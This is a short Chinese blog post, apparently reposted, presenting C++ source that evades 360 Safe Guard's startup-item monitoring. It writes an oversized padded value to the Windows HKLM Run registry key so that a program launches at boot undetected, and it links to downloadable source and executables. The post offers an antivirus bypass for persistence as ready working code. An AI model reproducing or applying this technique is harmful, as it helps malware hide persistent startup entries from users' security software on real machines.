| 关键词: nbsp Path HKEY 源程序 1024 ret printf 卫士 WriteRunAnti 别来 |
来源:Langouster's Blog 360安全卫士是通过轮询比较当前自启动项与先前保存的自启动项的差别来检测自启动项的增加的,一段的方法绕过它可能不是那么容易。 下面贴段代码,可以绕过360安全卫士写自启动项。 源程序: #include "stdafx.h"#include <windows.h> int _tmain(int argc, _TCHAR* argv[]){HKEY hKey;char *Path,*Path2="c:\\windows\\notepad.exe --";LONG ret; ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);if(ret){ printf("打开注册表项失败"); return 0;} Path=new char[1024*1024];memset(Path,'p',1024*1024);memcpy(Path,Path2,strlen(Path2)); ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));if(ret==0){ printf("写入成功");}else{ printf("写入失败");} return 0;} 源程序下载:WriteRunAnti360.rar 测试程序下载:WriteRunAnti360exe.rar |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|